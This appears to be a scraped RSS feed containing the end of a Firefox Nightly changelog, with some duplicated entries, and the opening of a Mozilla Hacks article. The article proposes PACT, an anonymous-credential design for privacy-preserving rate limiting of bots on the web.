<li>Maxx Crawford<a href="https://bugzil.la/2031707"> synchronized the Weather toggle between about:preferences#home and the panel</a> via the shared showWeather pref to prevent desync.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2021460"> updated Nova grid focus order</a> to align tab flow with visual order for keyboard users.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2034620"> fixed critical UI issues in Lists and Timer widgets</a> covering overflow, controls, and layout stability.</li>
<li>Maxx Crawford<a href="https://bugzil.la/2032462"> guarded document.dir access in Nova render paths</a> to avoid startup cache worker errors and improve startup stability.</li>
<li>Rolf<a href="https://bugzil.la/2031568"> added a new normalization method for the inferred interest vector</a> to stabilize topic relevance across sessions.</li>
<li>Rolf<a href="https://bugzil.la/2031569"> prevented unnecessary content refreshes during Pocket New Tab experiments</a>, reducing jank and bandwidth.</li>
<li>Sameeksha<a href="https://bugzil.la/2008197"> defined the Customize button’s expanded/collapsed state programmatically</a> using aria-expanded for better a11y.</li>
<li>liz<a href="https://bugzil.la/2008119"> clarified follow/unfollow/blocked button names with topic context</a> so screen readers announce clear actions.</li>
<li>Vector<a href="https://bugzil.la/2008128"> marked the Delete from History control as opening a dialog</a> via aria-haspopup=dialog for assistive tech.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers pref off</a>, restoring user selections.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> corrected privacy link color and focus styles</a> for contrast and keyboard visibility.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2030873"> added a wallpaper toggle reset in the Nova customization panel</a> so users can quickly restore default wallpapers without extra steps.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2031669"> fixed the Customize pencil button to match the Nova spec</a>, aligning placement and iconography for visual consistency.</li>
<li>Dre<a href="https://bugzil.la/2032607"> updated the ‘Fresh new’ wallpapers copy</a> to a clearer, localized message for better comprehension.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> fixed Nova privacy link color and focus styles</a> to meet contrast and focus ring guidelines, improving accessibility on New Tab.</li>
<li>Irene Ni<a href="https://bugzil.la/2034098"> adjusted Sponsored tile character limits</a> to prevent truncation/overflow, yielding cleaner titles across grid and wide tiles.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers user pref to false</a>, restoring wallpapers for affected users and preventing unintended disablement.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2034688"> hooked the wallpaper check into the new toggle logic</a> so the Customization Panel accurately reflects wallpaper availability and state.</li>
<li>Irene Ni<a href="https://bugzil.la/2034912"> landed Nova UI updates for the Daily Briefing 3-pack card</a>, improving spacing, type scale, and tap targets.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2030873"> added a wallpaper toggle reset in the Nova customization panel</a> so users can quickly restore default wallpapers without extra steps.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2031669"> fixed the Customize pencil button to match the Nova spec</a>, aligning placement and iconography for visual consistency.</li>
<li>Dre<a href="https://bugzil.la/2032607"> updated the ‘Fresh new’ wallpapers copy</a> to a clearer, localized message for better comprehension.</li>
<li>Irene Ni<a href="https://bugzil.la/2033927"> fixed Nova privacy link color and focus styles</a> to meet contrast and focus ring guidelines, improving accessibility on New Tab.</li>
<li>Irene Ni<a href="https://bugzil.la/2034098"> adjusted Sponsored tile character limits</a> to prevent truncation/overflow, yielding cleaner titles across grid and wide tiles.</li>
<li>Scott Downe<a href="https://bugzil.la/2034145"> fixed a regression that flipped the Wallpapers user pref to false</a>, restoring wallpapers for affected users and preventing unintended disablement.</li>
<li>Reem Hamoui<a href="https://bugzil.la/2034688"> hooked the wallpaper check into the new toggle logic</a> so the Customization Panel accurately reflects wallpaper availability and state.</li>
<li>Irene Ni<a href="https://bugzil.la/2034912"> landed Nova UI updates for the Daily Briefing 3-pack card</a>, improving spacing, type scale, and tap targets.</li>
</ul>
<h4>Search and Urlbar</h4>
<ul>
<li>Marco has fixed a<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2034743"> couple</a> of<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1989632"> issues</a> with the places databases to try and improve stability. This should help with avoiding users losing bookmarks or favicons.</li>
<li>Work continues on the new separate search bar to improve the functionality, e.g.<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033231"> allowing middle click</a> to perform a search in a new tab,<a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032991"> avoiding performing a</a> search when adding a search engine.</li>
<li>Work also continues on the new Nova layouts.</li>
</ul>
<h4>Smart Window</h4>
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032122">uplifted 10 bugs</a> to 150.0.1 dot release addressing initial user feedback from diary study and <a href="https://connect.mozilla.org/">Connect</a>
<ul>
<li>jump to bottom of conversation <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2028692">2028692</a></li>
<li>stop streaming button <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029204">2029204</a></li>
<li>back/forward navigation from assistant <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029229">2029229</a></li>
<li>dark mode for various chips <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2024499">2024499</a></li>
</ul>
</li>
<li>search engine switching from smart bar <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021973">2021973</a></li>
<li>Nova styling within smart window <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2026794">2026794</a></li>
</ul>
<h4>Storybook/Reusable Components/Acorn Design System</h4>
<ul>
<li>Dustin converted moz-breadcrumb-group variables into JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029181">Bug 2029181 – Convert moz-breadcrumb-group variables into JSON design tokens</a></li>
<li>Dustin converted moz-box-* variables into JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029180">Bug 2029180 – Convert moz-box-* variables into JSON design tokens</a></li>
<li>Dustin converted moz-promo variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029190">Bug 2029190 – Convert moz-promo variables into JSON design tokens</a></li>
<li>Dustin converted moz-reorderable-list variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029191">Bug 2029191 – Convert moz-reorderable-list variables into JSON design tokens</a></li>
<li>Dustin converted moz-visual-picker variables to JSON design tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2029193">Bug 2029193 – Convert moz-visual-picker-item variables into JSON design tokens</a></li>
<li>Dustin updated browser-shared.css so it passes use-design-tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022985">Bug 2022985 – Update browser-shared.css so it passes use-design-tokens</a></li>
<li>Dustin updated popup.css so it passes use-design-tokens <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022979">Bug 2022979 – Update popup.css so it passes use-design-tokens</a></li>
<li>Jon added opacity tokens and added opacity to use-design-tokens stylelint rule  <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1955325">Bug 1955325 – Create opacity tokens</a></li>
<li>Jon converted toolbar design tokens to JSON <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2017970">Bug 2017970 – Convert toolbar design tokens to json</a></li>
<li>Anna fixed moz-select with panel-list drop-down size inconsistency <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2032365">Bug 2032365 – Applications Action drop-down menus sometimes have a different size when opened</a></li>
<li>Anna fixed issue with the disabled state of moz-radio component <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027123">Bug 2027123 – moz-radio disabled state cannot be changed while the moz-radio-group is disabled</a></li>
<li>Anna updated moz-button and moz-box-button components to prevent label corruption when accesskeys are present and the label changes.   <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2022326">Bug 2022326 – moz-button with accesskey label becomes corrupted when l10nId updates dynamically</a></li>
</ul>
<h4>UX Fundamentals</h4>
<ul>
<li>The error pages shown when a server sends back an invalid response header or an unsupported content encoding now display accurate, context-specific messages. The invalid response header page also gained a helpful list of next steps. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2027209">2027209</a></li>
<li>In progress: The error page illustrations are being replaced with new artwork, and the system now supports per-illustration size configuration, giving each image the ability to define its own appropriate dimensions. – <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2031837">2031837</a></li>
</ul>
<h4>Settings Redesign</h4>
<ul>
<li>Tim converted settings related to Accessibility page to config-based pane <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968116">Bug 1968116 – Convert settings related to Accessibility page to config-based settings</a></li>
<li>Benjamin converted Privacy &amp; Security page to the config-based pane <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1968112">Bug 1968112 – Convert settings related to Privacy &amp; Security page to config-based settings</a></li>
<li>Finn integrated Firefox Labs page into setting-pane config <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2021047">Bug 2021047 – Integrate Firefox Labs page into setting-pane config</a></li>
<li>Anna converted Firefox Updates section to config-based prefs <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1990961">Bug 1990961 – Convert Firefox Updates section to config-based prefs</a></li>
<li>Mark Kennedy added moz-promo, that is welcoming users to the redesigned settings <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2015093">Bug 2015093 – Add a moz-promo to welcome users to the redesign</a>
<ul>
<li><a href="https://blog.nightly.mozilla.org/files/2026/06/image4.png"><img alt="The Firefox settings page in dark mode showing a notification banner that reads, “Same settings, new look!” The message further explains that the page has been reorganized to make settings easier to scan and explore, while keeping all existing settings unchanged. A “Got it” button appears below the message. The “AI Controls” section is visible underneath the banner." class="aligncenter size-full wp-image-2072" height="559" src="https://blog.nightly.mozilla.org/files/2026/06/image4.png" width="1431"></a></li>
</ul>
</li>
<li>Anna added possibility to search for actions in the redesigned “Applications” section <a href="https://bugzilla.mozilla.org/show_bug.cgi?id=2020370">Bug 2020370 – It’s no longer possible to search for actions in the new “Applications” section</a></li>
<li>Anna fixed the Settings navbar layout breakage</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacks.Mozilla.Org: PACT: Anonymous Credentials for the Web]]></title>
<description><![CDATA[This is the technical companion to our update on Distilled, “Keeping the web open and private in the bot era.” Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to solve. 
Bots (and privacy-preserving browsers) not welcome 
Browse a news site...]]></description>
<link>https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693291/tools/hacksmozillaorg-pact-anonymous-credentials-for-the-web/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="c43"><em><span class="c11 c1">This is the technical companion to our update on Distilled, </span><span class="c11 c1 c17"><a class="c5" href="https://blog.mozilla.org/en/privacy-security/keeping-the-web-open-and-private-in-the-bot-era/">“Keeping the web open and private in the bot era.”</a></span><span class="c11 c1"> Here we take a deeper look at the problem space, the design we’re proposing, and the problems still left to </span><span class="c1 c11">solve</span></em><span class="c13 c11 c1"><em>.</em> </span></p>
<h3 class="c24"><span class="c2 c1">Bots (and privacy-preserving browsers) not welcome </span></h3>
<p class="c40"><span class="c0">Browse a news site in a private window. Shop at a major retailer with a VPN. Visit a video streaming platform with anti-fingerprinting defenses tuned up. You’ll see the same responses: registration walls, block pages, and endless CAPTCHAs. The message is clear: </span><span class="c13 c11 c1">if we think you might be a bot, you’re not welcome</span><span class="c0">. </span></p>
<p class="c53"><span class="c0">Websites have valid reasons for wanting to block bots. Bots enable volumetric abuse</span><span class="c1">, abuse that wouldn’t otherwise be feasible if they had to be carried out by humans</span><span class="c0">. </span><span class="c0"> For example</span><span class="c1">: SEO comment spam, credential stuffing and DDoSing</span><span class="c0">.</span><span class="c0"> Consequently many sites employ dedicated anti-abuse tooling which aims to keep the bots out whilst minimizing friction for human visitors. </span></p>
<p class="c21"><span class="c0">Unfortunately, that tooling is increasingly failing at both tasks. Browser privacy protections are </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/fingerprinting-protections/">dismantling</a></span><span class="c0"> the passive signals that anti-abuse systems depended on to identify and distinguish </span><span class="c0">visitors</span><span class="c0">. Meanwhile advances in generative AI have rendered CAPTCHAs ineffective: bots now solve them </span><span class="c3 c1"><a class="c5" href="https://www.usenix.org/system/files/usenixsecurity23-searles.pdf">faster and more reliably</a></span><span class="c0"> than </span><span class="c0">humans</span><span class="c0">. </span></p>
<p class="c33"><span class="c0">Many sites are switching to more invasive mechanisms and now ask visitors to disclose </span><span class="c1">identifying information</span><span class="c0">,</span><span class="c0"> e.g. an email address, a federated login or </span><span class="c1">disabling their VPN</span><span class="c0">. This means greater friction for users, since providing these details on a first visit takes time. It also compromises their privacy, since these details enable the same kinds of cross-site tracking that browser privacy protections were intended to mitigate. </span></p>
<p class="c38"><span class="c0">This </span><span class="c1">leaves</span><span class="c0"> users </span><span class="c1">with a</span><span class="c0"> dilemma. The more effectively they protect their privacy, the harder it is for websites to distinguish them from bots and the worse the treatment they receive. Website operators are also suffering. The additional friction they inflict upon well-behaved visitors harms their site, but many are willing to pay the costs if it mitigates volumetric abuse. </span></p>
<p class="c44"><span class="c1">Browser-based AI agents make this tension more acute. Sites may want to allow agents which are acting on behalf of individual users while blocking agents engaged in volumetric abuse. However, with no effective mechanisms to distinguish the two, websites are opting to block </span><span class="c17 c1"><a class="c5" href="https://dl.acm.org/doi/epdf/10.1145/3730567.3732913">both</a></span><span class="c0">. That hurts users, who should be free to choose the user agent they use to access the web; it hurts new browsers and agents, which struggle to interoperate; and it hurts sites, which lose legitimate visitors.</span></p>
<p class="c30"><span class="c0">The consequence is that the web gets worse for everyone. Users get more friction or less privacy or both. Website operators see more volumetric abuse and the friction they add drives away users </span><span class="c1">who</span><span class="c0"> would otherwise want to consume their content or services. New user</span><span class="c1"> </span><span class="c0">agents struggle to access the same content as conventional browsers. </span></p>
<h3 class="c12"><span class="c20 c1">The</span><span class="c20 c1"> Costs of </span><span class="c2 c1">Convenient</span><span class="c2 c1"> Solutions</span></h3>
<p class="c9"><span class="c0">Some large ecosystem players have put forward solutions that leverage their control of the dominant operating systems and their deep integration with consumer hardware. These rely on device attestation: identifiers and privileged code baked into devices at the hardware level, which let manufacturers prove what software is running on a user’s device. Exposing this functionality to the web means attesting to sites that the user is running approved software with trusted hardware and therefore isn’t a bot. There have been two substantive proposals.</span></p>
<p class="c9"><span class="c0">Google’s Web Environment Integrity, <a href="https://www.theregister.com/software/2023/11/02/google-abandons-web-environment-integrity-api-proposal/335969">abandoned in 2023</a>, was the blunt version. It attested to the user agent itself, as well as the operating system and device in use. Users would have lost control in two ways: once to the attester, which would decide which operating systems and devices could be blessed, and again to the website, which would decide which software to accept. If sites had adopted allow-lists of approved user agents, building a new browser would have become virtually impossible, and sites could have withdrawn access from any user agent they chose.</span></p>
<p class="c9"><span class="c0">Apple’s Private Access Tokens, <a href="https://developer.apple.com/news/?id=huqjyh7k">deployed</a> across their ecosystem in 2022, have more subtle issues. Built on the Privacy Pass protocol standardized at the IETF, they get a lot right: a user receives a renewed, limited batch of one-time tokens that can be presented to websites without linking their visits together. This provides privacy for users and has shown rate limits to be an effective tool for sites – both points we’ll return to later in this post.</span></p>
<p class="c9"><span class="c1">However, Private Access Tokens rely on device attestation, requiring that the hardware manufacturer be in overall control of the user’s device. Presenting a PAT tells a website you are locked into Apple’s rules for what counts as acceptable software. </span><span class="c1">Due to PAT’s technical design</span><sup class="c1"><a href="https://hacks.mozilla.org/?p=48374#:~:text=PAT%20requires">[1]</a></sup><span class="c1">, there’s no way to open the system to other sources of scarcity without compromising the system’s privacy properties, meaning that if more widely deployed, access to the web would</span><span class="c1"> become tied to having bought expensive hardware from a small, hard to change set of vendors</span><span class="c1">. </span></p>
<p class="c9"><span class="c1">Both approaches are ultimately hostile to users and to the openness of the web. Both are premised on parts of a user’s device that sit within the manufacturer’s control and beyond the user’s own. Were they widely deployed, the web would become just another walled garden with centralized gatekeepers controlling acceptable hardware, operating systems and software. As convenient as these solutions are for the players who already dominate the ecosystem, we think there’s a better path.</span></p>
<h3 class="c24"><span class="c2 c1">A Better Path Forward </span></h3>
<p class="c24"><span class="c1">Bots’ harms arise from their ability to operate beyond human scale. For sites to prevent volumetric abuse they</span><span class="c0"> don’t actually need to know </span><span class="c1">the user’s</span><span class="c0"> identity or </span><span class="c1">receive cryptographic</span><span class="c0"> proof that they’re running approved softwar</span><span class="c1">e. If sites knew their visitors were restricted to a rate </span><span class="c1">limit</span><span class="c1"> set by a site, that would be enough.  </span></p>
<p class="c34"><span class="c1">Rate limits</span><span class="c0"> only make sense if </span><span class="c1">they’re</span><span class="c0"> </span><span class="c1">tied to</span><span class="c0"> something scarce; something an attacker can’t cheaply replicate to evade the limit. </span><span class="c0">Without anchoring to a scarce resource, like the trusted hardware used in Private Access Tokens, attackers can generate as many fresh identities as they need to bypass the rate limit. </span></p>
<p class="c56"><span class="c1">However, </span><span class="c0">hardware is just one option for </span><span class="c1">scarcity</span><span class="c0">. Anything a user already has that an attacker can’t trivially spin up at scale will work</span><span class="c1">: e</span><span class="c0">mail addresses and phone numbers are naturally scarce</span><span class="c1">. A paid subscription costs an attacker the same as a real user.  </span><span class="c0">Even maintaining an account on a free service requires </span><span class="c1">some</span><span class="c0"> non-trivial work. </span></p>
<p class="c39"><span class="c0">What if we could use these scarce signals across the web? We</span><span class="c1"> could build </span><span class="c0">an open ecosystem with many parties offering scarcity signals, each site choosing which to accept. By </span><span class="c0">opening up who can provide a signal, and letting sites choose which to accept, we can avoid transferring control to device manufacturers and the resulting harms. </span></p>
<p class="c39"><span class="c1">As a concrete example of who might be well positioned to provide such a signal, we can consider VPN providers acting as a subscription service. Sites routinely block VPN users indiscriminately, whether through a deliberate policy choice or through an indirect consequence of rate limiting visitors per IP address. But a VPN subscription is a perfect source of scarcity. If the VPN provider could vouch for its users so that sites could rate limit each user individually – then users would be able to browse the web with less friction and without giving up their VPN usage. </span></p>
<p class="c35"><span class="c0">The catch is that building </span><span class="c1">a system that can enable this</span><span class="c0"> on the open web whilst </span><span class="c1">maintaining user’s privacy</span><span class="c0"> is genuinely difficult. </span><span class="c1">It requires that we take information from one site — that this user holds some scarce thing — and expose it to other sites so that they can use that as the basis for their rate limiting. </span><span class="c0">Letting one site verify a signal from another is </span><span class="c1">the sort of </span><span class="c0">information flow</span><span class="c1"> </span><span class="c0">that privacy-pr</span><span class="c1">eserving </span><span class="c0">browsers have spent the last decade locking down to </span><span class="c1">prevent cross-site tracking</span><span class="c0">. </span></p>
<p class="c35"><span class="c1">Our goal would be that no more than the minimum information gets through: a single bit communicating whether the user is below the rate limit set by the site. Leaking anything more – like the source of the scarcity that the rate limit is anchored to – would be unacceptable. Enabling a new cross-site information flow might feel like compromising privacy to gain better access, but reality is more nuanced. If a new system moves sites away from demanding that visitors be identifiable (whether through fingerprinting or login forms), </span><span class="c1">it can be a win for both privacy and access.</span></p>
<h3 class="c24"><span class="c2 c1">The Foundations </span></h3>
<p class="c50"><span class="c0">The good news is that the cryptographic foundations for a privacy preserving approach already exist. The </span><span class="c1 c3"><a class="c5" href="https://privacypass.github.io/">Privacy Pass protocol</a></span><span class="c3 c1"><a class="c5" href="https://www.google.com/url?q=https://privacypass.github.io/&amp;sa=D&amp;source=editors&amp;ust=1782228494401139&amp;usg=AOvVaw3uoXdqARBZKjQF5H8uwYKY">,</a></span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.petsymposium.org/2018/files/papers/issue3/popets-2018-0026.pdf">originally developed in 2018</a></span><span class="c0"> to reduce the friction of Cloudflare CAPTCHAs for Tor users, introduced the core primitive: a token that is </span><span class="c13 c11 c1">unlinkable </span><span class="c0">between issuance and redemption. You prove something to an issuer (e.g. by </span><span class="c1">solving a CAPTCHA</span><span class="c0">), receive some tokens, and later present a token to a website. The website can verify the token is legitimate, but can’t link it to the user it was issued to. </span></p>
<p><img alt="A diagram showing the protocol flow for Privacy Pass." class="aligncenter size-full wp-image-48375" height="1639" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-1.excalidraw1-scaled.png" width="2560"></p>
<p class="c27"><img alt="" title=""><span class="c20 c1 c57"><strong>Figure 1</strong>: </span><span class="c0"><em>In Privacy Pass, a CAPTCHA provider can issue tokens to a client which can then be used to bypass challenges for future site visits. Even if the CAPTCHA provider and sites collude, they can’t use the tokens to identify the user or their browsing history.</em> </span></p>
<p class="c52"><span class="c0">Privacy Pass has gone on to be successfully deployed in systems where the issuer and verifier have a prior trust relationship: </span><span class="c0">Apple</span><span class="c0"> uses it to authenticate users of </span><span class="c3 c1"><a class="c5" href="https://hacks.mozilla.org/feed/">Private Cloud Compute</a></span><span class="c0"> </span><span class="c1">and</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF">Private Rel</a></span><span class="c17 c1"><a class="c5" href="https://www.google.com/url?q=https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF&amp;sa=D&amp;source=editors&amp;ust=1782228494402463&amp;usg=AOvVaw0KGoiSPg-8NLvNvIiSSbPt">ay</a></span><span class="c1"> </span><span class="c0">without linking their activity to their identity, </span><span class="c0">Chrome</span><span class="c0"> uses it for </span><span class="c3 c1"><a class="c5" href="https://github.com/GoogleChrome/ip-protection">two-hop IP protection</a></span><span class="c0">, and </span><span class="c0">Kagi</span><span class="c0"> uses it to provide </span><span class="c17 c1"><a class="c5" href="https://help.kagi.com/kagi/privacy/privacy-pass.html">private search</a></span><span class="c0">. </span><span class="c0">These deployments work in part because a small number of parties have agreed in advance on who issues tokens and who accepts them. </span></p>
<p class="c18"><span class="c0">Applying this approach to an open system where any site can act as</span><span class="c0"> an issuer</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://docs.google.com/document/d/1k3QJG2D_Sq4zJiJRn9DfY80hEHuz9UWrJdTt8LbRsMM/edit?tab=t.0#heading=h.r8jxzjcoeumo">brings real challenges</a></span><span class="c0">.</span><span class="c0"> Firstly, even though tokens are unlinkable, knowing a user has access to a specific issuer is a privacy leak on its own, because you can infer that the user meets the relevant issuance criteria. </span><span class="c1">If one site can learn that you have a token from another site, that reveals that you have been to that site, which can be a major privacy problem. </span><span class="c0">This compounds if </span><span class="c1">sites </span><span class="c0">can learn the set of issuers </span><span class="c1">you have visited</span><span class="c0">, since it becomes a fingerprint which can be used to identify </span><span class="c1">you</span><span class="c0">. </span></p>
<p class="c8"><span class="c3 c1"><a class="c5" href="https://blog.cryptographyengineering.com/2014/11/27/zero-knowledge-proofs-illustrated-primer/">Generic techniques</a></span><span class="c0"> exist for proving a statement in zero knowledge: we can prove that </span><span class="c1">a client</span><span class="c0"> ha</span><span class="c1">s</span><span class="c0"> a token from a set of acceptable issuers without revealing which specific issuer it is. We’ll call this issuer blinding. </span><span class="c0">The generic approach is often slow, but </span><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-orru-zkproof-sigma-protocols-01.html">bespoke approaches</a></span><span class="c0"> tailored to the underlying cryptography can improve this considerably. </span></p>
<p class="c54"><span class="c0">Another challenge is how sites using rate limits decide who to trust to issue tokens. If an issuer misbehaves then the site’s rate limits become ineffective, enabling volumetric abuse. However, if we need to prevent the site from learning which issuers a user has access to, the site is only going to know that one of its trusted issuers was used, not which one. This makes mistakes or misbehaviour by an issuer difficult to detect, and makes it hard for sites to evaluate new issuers. Solving this challenge is essential for openness. Without adequate information, </span><span class="c0">sites are likely to lean towards conservative issuer selection. </span><span class="c1">That could lead to less choice between Anchors, which in turn could lead to a new form of gatekeeper being created.</span><span class="c0"> </span></p>
<p class="c32"><span class="c0">To solve this, sites at least need a way to calculate an aggregate score for each issuer they use. This should roughly correspond to how much of the traffic it considers abusive to have come from users using that particular issuer. Mozilla has long invested in systems like </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/partnership-ohttp-prio/">Prio</a></span><span class="c0"> which use multiparty computation (MPC) to protect user privacy whilst enabling aggregate measurements of system behaviour. </span></p>
<p class="c59"><span class="c0">Privacy Pass also struggles to handle dynamic adjustments to rate limits. Once tokens have been issued, they’re difficult to invalidate without either revoking all active tokens or risking attacks which can compromise the privacy of users. It’s also beneficial if sites can adjust rate limits on a per </span><span class="c1">client</span><span class="c0"> basis, for example by increasing rate limits where they become more confident the </span><span class="c1">client</span><span class="c0"> is benign and withdrawing access </span><span class="c1">when abuse is detected</span><span class="c0">. </span></p>
<p class="c47"><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-schlesinger-cfrg-act-00.html">Anonymous Credit Tokens</a></span><span class="c0"> </span><span class="c0">offer a useful building block to solve this problem. Conventional Privacy Pass schemes rely on issuing a bucket of tokens but ACT works differently by enabling the use of a credential with state. For example, an ACT credential can hold an internal counter. When the credential is presented, the site can check the counter is over some threshold and mutate it, increasing or decreasing </span><span class="c1">the counter whenever</span><span class="c0"> the site’s perception of the holder has improved or worsened. Critically, the exact value is never leaked to the site, preventing the site from tracking the holder and ensuring successive presentations of the same credential can’t be linked. </span></p>
<h3 class="c24"><span class="c2 c1">Putting it together </span></h3>
<p class="c19"><span class="c1">So how can we combine these techniques to build a system which can enable privacy-preserving rate limiting on the open web? In May 2026, we participated in a </span><a href="https://pactworkshop.com/"><span class="c17 c1">W3C CG Meeting</span></a><span class="c0"> in collaboration with Cloudflare, Chrome and other web stakeholders in which we started sketching out a design we’re calling PACT – Private Access Control Tokens. </span></p>
<p class="c19"><span class="c0">Rate limits need a starting point, a source of scarcity to anchor on. We’ll call an entity that provides such a source an </span><span class="c2 c1">Anchor</span><span class="c0">. To a user who meets the Anchor’s criteria, like having a subscription,</span><span class="c0"> an account in good standing</span><span class="c0">, or a verified phone number, an Anchor issues a batch of </span><span class="c2 c1">Endorsement </span><span class="c0">tokens, following the Privacy Pass model. In practice, Anchors could be any website which has access to this kind of signal. An Endorsement conveys</span><span class="c1"> </span><span class="c0">scarcity to other sites. </span></p>
<p class="c51"><span class="c0">That’s enough for a simple system where access is </span><span class="c1">either granted or denied</span><span class="c0">. But as we discussed earlier, we also want the ability to increase access where a visitor behaves benignly and decrease it where they don’t. </span><span class="c1">The state needed to enforce a rate limit</span><span class="c0"> can’t live in the Endorsement, because Endorsements cross trust boundaries between unrelated sites. We need a second object that can hold that state, scoped to the party that maintains it. </span></p>
<p class="c48"><span class="c0">We’ll call that the party that handles rate limiting for a site a </span><span class="c2 c1">Moderator </span><span class="c0">and the stateful object a </span><span class="c2 c1">Credential</span><span class="c0">. </span><span class="c1">A Credential is specific to a Moderator and, unlike endorsements, we limit each site to nominating a single Moderator. In the common case the site itself plays the Moderator role, so there’s no new entity or trust boundary. </span><span class="c1">A Moderator can also be a third-party service shared across many sites, allowing those sites to cooperatively share a rate limit.</span><span class="c0"> </span></p>
<p class="c48"><span class="c0">In the terminology of the previous section, the Anchor is the issuer of Endorsements, and the Moderator both verifies Endorsements and issues Credentials. A Moderator manages rate-limit policy: it decides which Anchors it trusts, accepts their Endorsements, and issues a Credential in return.</span></p>
<p class="c14"><img alt="" title=""><img alt="A diagram showing an overview of the PACT system" class="aligncenter size-full wp-image-48381" height="1655" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw21-scaled.png" width="2560"></p>
<p class="c14"><strong><span class="c1 c20">Figure 2: </span></strong><span class="c1"><em>(1) Clients acquire Endorsements from Anchors in the course of normal browsing to sites they have relationships with. (2) Clients can exchange Endorsements for a stateful Credential from a Moderator. (3) Credentials can be used to access sites which use that Moderator. Credentials can be updated over time.</em> </span></p>
<p class="c41"><span class="c0">Directly revealing which Anchor backed an Endorsement would leak a lot of information about the user. The issuer blinding techniques from the previous section solve this: when an Endorsement is redeemed, the Moderator only learns that it came from one of </span><span class="c1">the </span><span class="c0">Anchors it trusts, but not which one. </span></p>
<p class="c28"><span class="c0">When a Moderator covers more than one site, we let Credentials be presented across all of them but partition cookies and storage as</span><span class="c1"> we would for any other third party site</span><span class="c0">. The unlinkability of </span><span class="c1">Credential</span><span class="c0"> presentations keeps this from creating a new cross-site identifier. The benefit is that good behaviour on one site improves access on every site the Moderator covers, and bad behaviour cuts it everywhere. Websites can already build the same capability with a shared account system, so this doesn’t create a new way to lock users out, but it </span><span class="c1">does provide a</span><span class="c0"> new way to grant access without requiring users to give up their privacy. </span></p>
<p class="c28"><span class="c0">Enabling Moderators that cover many sites carries a centralisation risk, simila</span><span class="c1">r </span><span class="c0">to the concentration we see today in anti-abuse providers. The mitigation is that the choice of Moderator stays with each site, and the choice of trusted Anchors stays with each Moderator. Th</span><span class="c1">is</span><span class="c0"> </span><span class="c1">can’t</span><span class="c0"> reverse the centralisation pressure the web already faces, but it </span><span class="c1">ensures this system won’t lead to additional lock-in</span><span class="c0">: a new Anchor or a new Moderator can be adopted without coordinating with a dominant vendor. </span></p>
<p class="c46"><span class="c0">The </span><span class="c1">system then has three flows</span><span class="c0">.</span><span class="c0"> First, the user </span><span class="c1">receives</span><span class="c0"> Endorsements from an Anchor in the course of normal interaction</span><span class="c1">, based on the Anchor’s positive view of the user</span><span class="c0">. This is </span><span class="c0">a relatively rare operation for any given user and Anchor. After all, as our source of scarcity, Endorsements should not be too easy to accumulate.</span></p>
<p class="c10"><img alt="" title=""><img alt="A diagram showing the PACT Anchor Flow" class="aligncenter size-full wp-image-48377" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-3.excalidraw1-scaled.png" width="2560"></p>
